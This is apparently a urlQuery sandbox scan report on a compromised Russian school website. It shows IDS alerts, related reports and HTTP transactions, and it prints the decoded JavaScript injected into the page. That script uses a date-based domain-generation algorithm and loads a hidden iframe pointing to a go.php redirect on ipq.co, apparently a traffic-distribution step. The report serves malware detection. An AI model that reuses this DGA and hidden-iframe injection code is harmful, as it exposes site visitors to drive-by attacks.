Overview

URL: http://www.sc62.lipetsk.ru/
IP: 195.34.232.173
ASN: AS8570 OJSC Rostelecom
Location: Russian Federation
Report completed: 2012-11-06 03:36:43 CET
urlQuery Alerts: Detected a TDS URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp  Source IP  Destination IP  Severity  Alert
2012-11-06 03:36:10  195.34.232.173  urlQuery Client  1  ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-06 03:36:10  195.34.232.173  urlQuery Client  2  ET WEB_CLIENT eval String.fromCharCode String Which May Be Malicious
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data,
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data,
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11  195.34.232.173  urlQuery Client  3  FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 195.34.232.173

Date  Alerts / IDS  URL  IP
2013-03-29 08:57:31  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-03-25 15:20:24  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-03-19 08:36:13  0 / 9  http://licey24.lipetsk.ru/english/presentation2.html  195.34.232.173
2013-03-14 02:22:11  2 / 3  http://zlpo.lipetsk.ru/index.htm  195.34.232.173
2013-03-04 01:13:18  2 / 3  http://zlpo.lipetsk.ru/bend_lgs.htm  195.34.232.173
2013-03-03 23:03:47  2 / 3  http://zlpo.lipetsk.ru/bend_lgr.htm  195.34.232.173

Last 6 reports on ASN: AS8570 OJSC Rostelecom

Date  Alerts / IDS  URL  IP
2013-03-29 08:57:31  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-03-25 15:20:24  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-03-19 08:36:13  0 / 9  http://licey24.lipetsk.ru/english/presentation2.html  195.34.232.173
2013-03-14 02:22:11  2 / 3  http://zlpo.lipetsk.ru/index.htm  195.34.232.173
2013-03-04 01:13:18  2 / 3  http://zlpo.lipetsk.ru/bend_lgs.htm  195.34.232.173
2013-03-03 23:03:47  2 / 3  http://zlpo.lipetsk.ru/bend_lgr.htm  195.34.232.173

Last 6 reports on domain: www.sc62.lipetsk.ru

Date  Alerts / IDS  URL  IP
2013-03-29 08:57:31  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-03-25 15:20:24  1 / 8  http://www.sc62.lipetsk.ru/link.htm  195.34.232.173
2013-02-11 17:51:50  1 / 0  http://www.sc62.lipetsk.ru/24q.htm  195.34.232.173
2012-11-18 07:09:07  1 / 0  http://www.sc62.lipetsk.ru/  195.34.232.173
2012-11-14 06:57:37  1 / 8  http://www.sc62.lipetsk.ru/2.htm  195.34.232.173
2012-11-07 20:21:07  1 / 0  http://www.sc62.lipetsk.ru/7q.htm  195.34.232.173



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 1704, repeated: 1)

function getMonthNum(abbMonth) {
    var arrMon = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec");
    var i;
    for (i = 0; i < arrMon.length; i++) {
        if (abbMonth == arrMon[i]) {
            return i;
        }
    }
    return -1;
}
function dateUTCdateToDate(dateString) {
    var arrDateStr = dateString.split(" ");
    var month = getMonthNum(arrDateStr[2]);
    var day = arrDateStr[1];
    var year = arrDateStr[3];
    var hour = arrDateStr[4].substr(0, 2);
    var minute = arrDateStr[4].substr(3, 2);
    var second = arrDateStr[4].substr(6, 2);
    return new Date(year, month, day, hour, minute, second);
}
function get_domain(y, m, d, h, prefix, postfix) {
    var chars = "k2pdh4qwej9j2rob51holnl3prxbkwhfp5ea";
    url = new String();
    for (var i = 0; i < 4; i++) {
        t = i;
        l = chars.length;
        t = (t + h) % l;
        url += chars.substr(t, 1);
        t = (t + d) % l;
        url += chars.substr(t, 1);
        t = (t + m) % l;
        url += chars.substr(t, 1);
        t = (t + y) % l;
        url += chars.substr(t, 1);
    }
    return (prefix + url + postfix).toLowerCase();
}
function get_current_domain(prefix, postfix) {
    var dt = new Date();
    var y = dt.getUTCFullYear();
    var m = dt.getMonth();
    var d = dt.getUTCDate();
    var h = dt.getUTCHours();
    return get_domain(y, m, d, Math.floor(h / 8), prefix, postfix);
}
var current_domain = "http://" + get_current_domain("g", "") + ".ipq.co/go.php?sid=3";
setTimeout(function() {
    try {
        var s = document.createElement("iframe");
        s.style.visibility = "hidden";
        s.style.display = "none";
        s.setAttribute("src", current_domain);
        document.body.appendChild(s)
    } catch (e) {}
}, 500);

Executed Writes (2)

#1 JavaScript::Write (size: 0, repeated: 1)

#2 JavaScript::Write (size: 314, repeated: 1)

<img src='http://counter.yadro.ru/hit?t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s1176*885*24;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884' alt='' title='LiveInternet' border=0 width=1 height=1>


HTTP Transactions (23)


Request Response
GET / HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:10 GMT
Connection: close
Last-Modified: Wed, 03 Oct 2012 10:03:09 GMT
Etag: "3dd42f-5228-bee85140"
Accept-Ranges: bytes
Content-Length: 21032
GET /go.php?sid=1 HTTP/1.1

Host: h39086.srv0.test-hf.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=utf-8
Server: nginx/1.2.4
Date: Tue, 06 Nov 2012 02:36:10 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
Last-Modified: Sat, 11 Feb 2012 16:51:38 GMT
Etag: "2e7a07-869-4b8b30f0cda80"
Content-Encoding: gzip
GET /Orion%20(Universal)%20Bonus%20Pack%20V1%20Desktop%20X.ico HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: image/x-icon
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:10 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:26 GMT
Etag: "3dd430-f83e-cff07780"
Accept-Ranges: bytes
Content-Length: 63550
GET /Orion%20(Universal)%20V1b%20Icon%2038.ico HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: image/x-icon
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:10 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:27 GMT
Etag: "3dd431-f83e-cfffb9c0"
Accept-Ranges: bytes
Content-Length: 63550
GET /Recycle.ico HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: image/x-icon
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:10 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:29 GMT
Etag: "3dd433-f83e-d01e3e40"
Accept-Ranges: bytes
Content-Length: 63550
GET /Recycle%201.ico HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: image/x-icon
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:10 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:30 GMT
Etag: "3dd432-f83e-d02d8080"
Accept-Ranges: bytes
Content-Length: 63550
GET /2.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT
Etag: "3dd427-8e-ce63bd00"
Accept-Ranges: bytes
Content-Length: 142
GET /3.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT
Etag: "3dd42a-5da-ce63bd00"
Accept-Ranges: bytes
Content-Length: 1498
GET /4.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT
Etag: "3dd42b-c71-ce63bd00"
Accept-Ranges: bytes
Content-Length: 3185
GET /1.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:22 GMT
Etag: "3dd423-468f-cfb36e80"
Accept-Ranges: bytes
Content-Length: 18063
GET /ukfdyfz/%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Location: http://www.lipetsk.ru/errors/404.html
Content-Length: 221
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: "289dff-26c-4cb2ceb2654c0"
Accept-Ranges: bytes
Content-Length: 620
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: keep-alive
GET /clock6.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:01 GMT
Etag: "3dd42e-f58-ce72ff40"
Accept-Ranges: bytes
Content-Length: 3928
GET /style.css HTTP/1.1

Host: www.host-food.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/1.2.4
Date: Tue, 06 Nov 2012 02:36:12 GMT
Last-Modified: Wed, 13 Apr 2011 13:57:32 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
Content-Encoding: gzip
GET /5.swf HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:11 GMT
Connection: close
Last-Modified: Fri, 03 Feb 2006 12:11:20 GMT
Etag: "3dd42d-3b73-cf94ea00"
Accept-Ranges: bytes
Content-Length: 15219
GET /hit?t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s1176*885*24;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1

Host: counter.yadro.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Date: Tue, 06 Nov 2012 02:36:12 GMT
Server: 0W/0.8c
Location: http://counter.yadro.ru/hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s1176*885*24;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884
Content-Length: 32
Expires: Sun, 06 Nov 2011 20:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1Gc7US0drzn2; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /images/logo.png HTTP/1.1

Host: www.host-food.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.host-food.ru/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.2.4
Date: Tue, 06 Nov 2012 02:36:12 GMT
Content-Length: 11341
Last-Modified: Thu, 19 Jan 2012 21:20:54 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
GET /hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s1176*885*24;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1

Host: counter.yadro.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1
Cookie: FTID=1Gc7US0drzn2
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 02:36:12 GMT
Server: 0W/0.8c
Connection: Close
Content-Length: 104
Expires: Sun, 06 Nov 2011 20:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: VID=3KRk6B00xj12; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1

Host: www.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
HTTP/1.1 302 Found

Content-Type: text/html; charset=windows-1251
Server: nginx/0.7.63
Date: Tue, 06 Nov 2012 02:36:12 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: Vzd=1; expires=Wed, 07 Nov 2012 02:36:12 GMT
Location: http://www.lipetsk.ru/errors/404.html?pass=1&backurl=/errors/404.html&
GET /images/stop.png HTTP/1.1

Host: www.host-food.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.host-food.ru/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.2.4
Date: Tue, 06 Nov 2012 02:36:12 GMT
Content-Length: 10949
Last-Modified: Thu, 27 Jan 2011 15:47:38 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1

Host: www.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/
Cookie: Vzd=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=windows-1251
Server: nginx/0.7.63
Date: Tue, 06 Nov 2012 02:36:12 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: Ccnt[/errors/404.html]=1; expires=Wed, 07 Nov 2012 02:36:12 GMT
GET /favicon.ico HTTP/1.1

Host: www.sc62.lipetsk.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Server: nginx/0.5.26
Date: Tue, 06 Nov 2012 02:36:12 GMT
Connection: close
Last-Modified: Tue, 10 Jul 2007 10:48:55 GMT
Etag: "3dd796-0-81fff3c0"
Accept-Ranges: bytes
Content-Length: 0
GET /go.php?sid=3 HTTP/1.1

Host: gkq522w1rpehodjob.ipq.co

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sc62.lipetsk.ru/